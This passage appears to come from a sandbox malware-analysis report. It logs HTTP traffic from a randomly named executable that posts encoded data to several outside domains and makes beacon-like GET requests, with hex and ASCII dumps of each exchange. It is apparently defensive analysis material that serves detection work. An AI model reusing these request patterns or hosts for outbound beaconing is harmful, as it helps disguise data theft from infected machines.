                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                Sep 23, 2024 14:39:32.458894968 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                Sep 23, 2024 14:39:32.458914042 CEST448INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                Sep 23, 2024 14:39:32.458934069 CEST1236INData Raw: 65 73 3a 3c 2f 68 34 3e 20 0a 20 20 3c 75 6c 3e 20 09 3c 6c 69 3e 54 68 65 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 66 69 6c 65 20 73 70 65 63 69 66 69 65 64 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 6f 6e 20 74 68 65 20 57 65 62 20 73 65
                                Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
                                Sep 23, 2024 14:39:32.458947897 CEST224INData Raw: 64 65 74 61 69 6c 73 2d 72 69 67 68 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c
                                Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.chalet-tofane.net:80/uesf/</td></tr> <tr><th>Physical Path</th><td>&nbsp
                                Sep 23, 2024 14:39:32.458952904 CEST792INData Raw: 3b 26 6e 62 73 70 3b 26 6e 62 73 70 3b 44 3a 5c 69 6e 65 74 70 75 62 5c 77 77 77 72 6f 6f 74 5c 75 65 73 66 5c 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 4c 6f 67 6f 6e 20 4d 65 74
                                Data Ascii: ;&nbsp;&nbsp;D:\inetpub\wwwroot\uesf\</td></tr> <tr class="alt"><th>Logon Method</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr><th>Logon User</th><td>&nbsp;&nbsp;&nbsp;Anonymous</td></tr> <tr class="alt"><th>Request Tracing


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                40192.168.2.74974462.149.128.40803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:34.409079075 CEST482OUTGET /uesf/?76=z4JBjkhdawOvrgQ3/n9w4VhuG3+mvNpQWeVdJRkYJDu2YFtbuhkNmpkohWu/kto2VaQ1uMJYrSrWzkHi22xejudxEXfvpm+SoyIUt5G98Vt9xyNVSrHPgcfLvBC9CdBqRcbgarcrONxp&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.chalet-tofane.net
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:39:35.074392080 CEST1236INHTTP/1.1 404 Not Found
                                Cache-Control: private
                                Content-Type: text/html; charset=utf-8
                                Server: Microsoft-IIS/10.0
                                X-Powered-By: ASP.NET
                                Date: Mon, 23 Sep 2024 12:39:34 GMT
                                Connection: close
                                Content-Length: 5115
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                Sep 23, 2024 14:39:35.074445009 CEST224INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;
                                Sep 23, 2024 14:39:35.074450016 CEST1236INData Raw: 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 43 38 37 42 32 3b 20 0a 7d 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79
                                Data Ascii: background-color:#5C87B2; }#content{margin:0 0 0 2%;position:relative;} .summary-container,.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;} .content-container p{margin:0 0 10px 0; }#details-left{
                                Sep 23, 2024 14:39:35.074466944 CEST1236INData Raw: 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 33 3e 20 0a 20 20 3c 68 34 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 68 61 73 20 62 65 65
                                Data Ascii: >HTTP Error 404.0 - Not Found</h3> <h4>The resource you are looking for has been removed, had its name changed, or is temporarily unavailable.</h4> </div> <div class="content-container"> <fieldset><h4>Most likely causes:</h4> <ul> <
                                Sep 23, 2024 14:39:35.074480057 CEST1236INData Raw: 62 73 70 3b 4d 61 70 52 65 71 75 65 73 74 48 61 6e 64 6c 65 72 3c 2f 74 64 3e 3c 2f 74 72 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c 61 73 73 3d 22 61 6c 74 22 3e 3c 74 68 3e 48 61 6e 64 6c 65 72 3c 2f 74 68 3e 3c 74 64 3e 26 6e 62 73 70 3b 26 6e 62
                                Data Ascii: bsp;MapRequestHandler</td></tr> <tr class="alt"><th>Handler</th><td>&nbsp;&nbsp;&nbsp;StaticFile</td></tr> <tr><th>Error Code</th><td>&nbsp;&nbsp;&nbsp;0x80070002</td></tr> </table> </div> <div id="details-right">
                                Sep 23, 2024 14:39:35.074487925 CEST166INData Raw: 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 44 3d 36 32 32 39 33 26 61 6d 70 3b 49 49 53 37 30 45 72 72 6f 72 3d 34 30 34 2c 30 2c 30 78 38 30 30 37 30 30 30 32 2c 31 37 37 36 33 22 3e 56 69 65 77 20 6d 6f
                                Data Ascii: .microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                41192.168.2.7497453.33.130.190803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:40.142749071 CEST746OUTPOST /gxfy/ HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.greekhause.org
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.greekhause.org/gxfy/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 50 4b 67 36 6b 58 33 69 4e 6a 35 2b 2b 31 64 49 57 6d 32 45 43 31 4a 41 6f 73 57 46 33 4d 51 69 44 4d 42 6f 33 57 4d 37 5a 62 43 4e 76 6b 62 4d 6b 57 69 49 33 31 30 66 6e 2f 44 79 4c 61 66 67 39 6e 67 36 6a 63 51 53 56 4a 4b 35 61 4e 66 56 61 6d 53 65 36 58 39 6e 68 37 34 75 69 2b 48 72 39 63 6b 52 79 2b 33 4f 47 31 34 53 4a 50 42 51 62 50 47 62 77 66 63 4c 32 50 56 2b 4c 7a 37 31 34 61 6a 44 62 38 65 32 57 57 4a 74 45 59 30 2f 72 67 77 52 71 44 34 7a 7a 42 53 68 2f 44 58 73 54 2f 31 62 4b 65 51 59 41 57 75 59 51 51 44 42 70 46 41 34 49 39 31 6b 4a 41 71 61 6c 4a 48 46 70 37 74 35 36 59 30 6d 6e 49 53 45 56 59 67 5a 66 51 3d 3d
                                Data Ascii: 76=PKg6kX3iNj5++1dIWm2EC1JAosWF3MQiDMBo3WM7ZbCNvkbMkWiI310fn/DyLafg9ng6jcQSVJK5aNfVamSe6X9nh74ui+Hr9ckRy+3OG14SJPBQbPGbwfcL2PV+Lz714ajDb8e2WWJtEY0/rgwRqD4zzBSh/DXsT/1bKeQYAWuYQQDBpFA4I91kJAqalJHFp7t56Y0mnISEVYgZfQ==


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                42192.168.2.7497463.33.130.190803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:42.692054987 CEST766OUTPOST /gxfy/ HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.greekhause.org
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 235
                                Connection: close
                                Referer: http://www.greekhause.org/gxfy/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 50 4b 67 36 6b 58 33 69 4e 6a 35 2b 2f 55 74 49 55 46 75 45 54 56 4a 44 6b 4d 57 46 2b 73 51 63 44 4d 64 6f 33 58 4a 67 5a 4a 6d 4e 32 42 2f 4d 6c 53 2b 49 30 31 30 66 73 66 44 33 49 71 66 52 39 6e 6b 79 6a 5a 6f 53 56 4a 32 35 61 4a 62 56 5a 52 6d 52 6f 58 39 66 70 62 34 2f 74 65 48 72 39 63 6b 52 79 2b 7a 30 47 31 41 53 4a 2f 78 51 55 4f 48 4e 35 2f 63 49 33 50 56 2b 47 54 36 79 34 61 6a 71 62 35 47 4d 57 55 78 74 45 59 45 2f 72 31 4d 57 68 44 34 31 75 52 54 65 76 54 47 33 62 76 64 54 4e 73 41 47 47 6d 6d 5a 52 6d 65 6a 7a 6e 4d 55 57 73 4e 66 4e 43 4f 73 79 76 61 77 72 36 70 68 33 36 41 48 34 2f 33 75 59 4b 42 64 4a 67 76 42 70 6d 35 46 75 45 50 54 70 51 59 6a 75 52 65 50 4c 6e 34 3d
                                Data Ascii: 76=PKg6kX3iNj5+/UtIUFuETVJDkMWF+sQcDMdo3XJgZJmN2B/MlS+I010fsfD3IqfR9nkyjZoSVJ25aJbVZRmRoX9fpb4/teHr9ckRy+z0G1ASJ/xQUOHN5/cI3PV+GT6y4ajqb5GMWUxtEYE/r1MWhD41uRTevTG3bvdTNsAGGmmZRmejznMUWsNfNCOsyvawr6ph36AH4/3uYKBdJgvBpm5FuEPTpQYjuRePLn4=


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                43192.168.2.7497473.33.130.190803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:45.384926081 CEST1779OUTPOST /gxfy/ HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.greekhause.org
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 1247
                                Connection: close
                                Referer: http://www.greekhause.org/gxfy/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 50 4b 67 36 6b 58 33 69 4e 6a 35 2b 2f 55 74 49 55 46 75 45 54 56 4a 44 6b 4d 57 46 2b 73 51 63 44 4d 64 6f 33 58 4a 67 5a 4a 75 4e 71 6e 6a 4d 6b 7a 2b 49 31 31 30 66 68 2f 44 32 49 71 66 49 39 6a 41 32 6a 5a 73 6f 56 4d 36 35 61 73 50 56 59 6c 36 52 79 48 39 66 72 62 34 76 69 2b 47 7a 39 66 4d 56 79 2b 6a 30 47 31 41 53 4a 38 70 51 54 66 48 4e 31 66 63 4c 32 50 56 69 4c 7a 36 57 34 61 37 62 62 34 7a 78 52 6b 52 74 45 38 6f 2f 75 48 6b 57 73 44 34 33 76 52 54 47 76 54 4b 53 62 76 41 6f 4e 74 30 34 47 68 71 5a 54 79 44 4c 33 45 6b 66 44 39 31 2b 45 44 75 36 39 35 79 50 70 35 39 44 39 4e 77 46 6c 50 4b 4b 63 4a 5a 6d 4d 6d 48 43 79 56 31 56 6f 6d 76 30 6d 48 35 35 2b 68 43 2f 49 77 4d 59 45 6d 70 67 6d 6d 57 6b 49 6b 42 38 2f 75 37 4c 37 6f 47 4a 67 57 55 74 7a 6f 41 47 33 70 33 7a 57 79 47 51 47 63 77 77 53 4b 62 6d 4a 59 55 35 4a 76 63 59 33 50 65 66 51 44 73 67 46 49 4c 53 68 57 52 78 39 45 35 51 75 45 4b 68 7a 4a 4b 72 30 53 49 30 46 52 38 6a 54 58 6e 61 57 75 63 73 54 4f 42 50 4e 63 54 [TRUNCATED]
                                Data Ascii: 76=PKg6kX3iNj5+/UtIUFuETVJDkMWF+sQcDMdo3XJgZJuNqnjMkz+I110fh/D2IqfI9jA2jZsoVM65asPVYl6RyH9frb4vi+Gz9fMVy+j0G1ASJ8pQTfHN1fcL2PViLz6W4a7bb4zxRkRtE8o/uHkWsD43vRTGvTKSbvAoNt04GhqZTyDL3EkfD91+EDu695yPp59D9NwFlPKKcJZmMmHCyV1Vomv0mH55+hC/IwMYEmpgmmWkIkB8/u7L7oGJgWUtzoAG3p3zWyGQGcwwSKbmJYU5JvcY3PefQDsgFILShWRx9E5QuEKhzJKr0SI0FR8jTXnaWucsTOBPNcT9NSqHFCTncK/B5necP44j3zSdFFmoqA5ymfCqFrJUXMR0OjEZY/nn5t5EAQWgBiHqdH3Za9a793/k7pvOxNIUUiRItvoHnCfyh7eVnzREaKVsitmaHHgMw5Ed7bKOZP/xUZv8c+mArGE8PZgzBKCmLTLwSX44EUL4GWnQb61MdmV7W3tMBJvmHXHwk0hS4aYOgAi6ElXDNntDN5d8wU+RTjkZDoqfdBzRrnxQMcnp29U3izionQUc+NMPhtgTxkJ3ZiWs1m3NdoUOxVhm7XeCzj4xSfq7PEb6zRqNotBTs+rGj1WDQOkwrzLW7SW/unModQr+ei8SEnxCp0iIHHZyft6lZvEeF+qJ82xhkxmma4opxpz8gH1OtNGDztyBVREjTL8kkB0aVX9pS0aVFxubHT4mbcg145fBfHaHVYAV5e13/+K5wqoaH0cxaB9DtIlpWEnEazCvbH4mcW71bcRVk9/yp9TGXedQ6t4POJ6G0RClsdlKyGhIEb4R8+3bLe9GD+DlX9zgQm4wxL6Qk3IOQ5aYYAvsqbzyjXd0SFnYuSYaVSyjAw5F+AvSkbko2BCnHUjz0K/Ir52BILu50+8NlgeFUvgNdfv8QiY2Zj7V084bhvzqhKl49t+Xft2s3qUXTPBWVa0JxFao6/FmFpgaPToMxQP12kjQ2 [TRUNCATED]


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                44192.168.2.7497483.33.130.190803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:47.920305014 CEST479OUTGET /gxfy/?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L HTTP/1.1
                                Host: www.greekhause.org
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Sep 23, 2024 14:39:48.399159908 CEST412INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Mon, 23 Sep 2024 12:39:48 GMT
                                Content-Type: text/html
                                Content-Length: 272
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 37 36 3d 43 49 49 61 6e 68 48 52 4d 67 4e 6f 7a 6b 73 35 52 47 66 4a 64 55 4e 58 33 2b 65 6d 7a 62 67 4e 66 2f 56 50 37 6b 52 73 4e 36 76 4e 30 57 7a 4d 76 47 33 47 39 55 49 67 2b 38 6a 69 4a 4b 76 75 72 43 41 68 30 63 38 65 41 4e 79 32 51 38 62 64 65 58 79 52 34 53 74 43 6d 6f 4a 63 6a 66 7a 47 35 70 49 6d 33 75 2b 4f 50 51 38 53 47 34 78 54 55 50 6e 46 78 4f 38 63 2b 2b 42 6b 49 79 44 79 67 64 62 74 61 37 65 6a 59 54 35 67 26 6d 74 4a 44 5f 3d 66 76 64 6c 4a 32 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?76=CIIanhHRMgNozks5RGfJdUNX3+emzbgNf/VP7kRsN6vN0WzMvG3G9UIg+8jiJKvurCAh0c8eANy2Q8bdeXyR4StCmoJcjfzG5pIm3u+OPQ8SG4xTUPnFxO8c++BkIyDygdbta7ejYT5g&mtJD_=fvdlJ2L"}</script></head></html>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                45192.168.2.749749154.198.53.36803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:53.632194996 CEST734OUTPOST /1zd7/ HTTP/1.1
                                Host: www.085bet.xyz
                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                Accept-Language: en-US,en;q=0.9
                                Accept-Encoding: gzip, deflate, br
                                Origin: http://www.085bet.xyz
                                Content-Type: application/x-www-form-urlencoded
                                Cache-Control: max-age=0
                                Content-Length: 215
                                Connection: close
                                Referer: http://www.085bet.xyz/1zd7/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.83 Safari/535.11
                                Data Raw: 37 36 3d 57 41 64 34 4c 6d 4f 56 69 4b 6b 45 46 6a 4c 4e 6f 4d 4a 6a 72 36 66 63 59 2b 49 4a 6f 34 63 2f 7a 38 47 71 73 47 48 5a 52 42 4e 56 31 73 45 31 68 66 55 50 4e 76 71 48 4e 4f 73 44 70 49 51 35 45 4f 44 4e 49 77 41 37 50 6b 2f 35 4e 4f 38 5a 45 63 64 59 72 39 58 70 37 34 74 5a 42 35 6f 37 45 35 75 36 34 4f 57 4a 47 49 4d 55 43 56 44 55 54 56 43 58 5a 54 61 4b 6a 44 54 56 54 6b 77 46 58 34 6f 73 70 54 79 4b 36 78 73 63 36 64 79 62 4d 57 71 42 2f 72 62 6f 74 77 4a 4f 75 47 65 44 34 2f 2f 4b 57 30 47 69 62 51 2b 56 61 69 4c 7a 5a 2b 36 7a 44 69 2f 6b 30 62 63 4d 65 33 59 79 6d 6d 38 50 74 76 79 59 65 2f 5a 7a 39 6f 66 30 42 77 3d 3d
                                Data Ascii: 76=WAd4LmOViKkEFjLNoMJjr6fcY+IJo4c/z8GqsGHZRBNV1sE1hfUPNvqHNOsDpIQ5EODNIwA7Pk/5NO8ZEcdYr9Xp74tZB5o7E5u64OWJGIMUCVDUTVCXZTaKjDTVTkwFX4ospTyK6xsc6dybMWqB/rbotwJOuGeD4//KW0GibQ+VaiLzZ+6zDi/k0bcMe3Yymm8PtvyYe/Zz9of0Bw==
                                Sep 23, 2024 14:39:54.540385962 CEST729INHTTP/1.1 405 Method Not Allowed
                                Content-Type: text/html
                                Date: Mon, 23 Sep 2024 12:39:54 GMT
                                Server: openresty
                                X-Cache: BYPASS
                                Content-Length: 556
                                Connection: close
                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 [TRUNCATED]
                                Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                46192.168.2.749750154.198.53.36803040C:\Program Files (x86)\UHeXzmqFNwlEWXwHTsbkJdGXKxQurhTysAKxxWCnsrbvEtSepCdqlchVmuXrHVSDNhjEFBqXiaqeXqw\JkyHsYXxoyjW.exe
                                TimestampBytes transferredDirectionData
                                Sep 23, 2024 14:39:56.205401897 CEST754OUTPOST /1zd7/ HTTP/1.1
                                Host: www.085bet.xyz
